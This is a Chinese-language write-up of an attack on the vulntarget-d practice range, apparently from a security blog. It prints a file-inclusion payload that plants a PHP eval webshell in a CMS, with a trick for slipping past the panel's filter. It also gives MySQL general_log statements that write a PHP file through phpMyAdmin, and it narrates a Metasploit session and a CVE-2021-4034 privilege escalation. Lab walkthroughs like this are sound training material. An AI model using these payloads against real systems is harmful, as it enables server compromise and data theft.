【永久开源】vulntarget-d 打靶记录——作者：NaMi

乌鸦安全

发布于 2022-03-11 14:05:02

1.1K0

发布于 2022-03-11 14:05:02

文章被收录于专栏：乌鸦安全

✎ 阅读须知

乌鸦安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限，如转载或传播此文章，需保证文章的完整性，未经允许，禁止转载！

本文所提供的工具仅用于学习，禁止用于其他，请在24小时内删除工具文件！！！

本文作者：NaMi 本文已获得作者授权

vuntarget免责声明

vulntarget靶场系列仅供安全专业人员练习渗透测试技术，此靶场所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用靶场中的技术资料对任何计算机系统进行入侵操作。利用此靶场所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

vulntarget靶场系列拥有对此靶场系列的的修改、删除和解释权限，未经授权，不得用于其他。

vulntarget地址：

https://github.com/crow821/vulntarget

vulntarget-d 打靶记录

1. 拓扑

修改IP1: 192.168.0.103 kali：192.168.0.105

2. Ubuntu

判断连通性

端口扫描

查看详细信息，由此可以判断出使用的宝塔面板，默认端口8888

81端口开放了一个cms

看到底下的版本信息：

1.可以寻找历史漏洞。2.自己审计

网上也有很多漏洞的复现

好巧，也是乌鸦师傅的文章

文件包含漏洞POC，一套丝滑小连招:

GET : [http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl](http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl)

POST : variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval($_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

GET : [http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl](http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl)

POST : variable=1&tpl=data/Runtime/Logs/Home/22_02_10.log

GET : http://192.168.0.103:81/shell.php

接着访问被BT拦截了：

写入一个phpinfo看一下，disable_function禁用的函数还不少：

没有过滤eval

passthru,exec,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

在第一次请求的时候需要注意shell会被拦截，写_POST的时候要给加一个转义否则会写入错误。在markdown中复制这个

variable=1&tpl=<?php fputs(fopen("sh4.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

这样就拿下了这台机器

3. Ubuntu提权

上线MSF，首先生成一个木马文件：

然后启动一个监听：

将文件下载到目标机器

成功上线：

前段时间出了一个新的提权漏洞CVE-2021-4034，提权到root权限：

在桌面拿到第一个flag:

4. windows机器

看到第二块网卡

添加路由并进行端口扫描，深夜了我就直接针对IP进行端口扫描了，为了早点睡觉。看到开放了如下端口：

挂上代理访问没啥内容：

目录扫描，发现phpmyadmin

l.php是一个探针，而且数据库也是个弱密码

通过phpinfo界面得知了网站的绝对路径：

C:/phpstudy/PHPTutorial/WWW/phpinfo.php

然后通过弱口令进入phpmyadmin，通过写日志拿下webshell:

show global variables like "%genera%";          //查询general_log配置
set global general_log='on';              //开启general log模式
SET global general_log_file='C:/phpstudy/PHPTutorial/WWW/cmd.php';    //设置日志文件保存路径
SELECT '<?php phpinfo();?>';              //phpinfo()写入日志文件
set global general_log='off';              //关闭general_log模式

获取一个普通权限的shell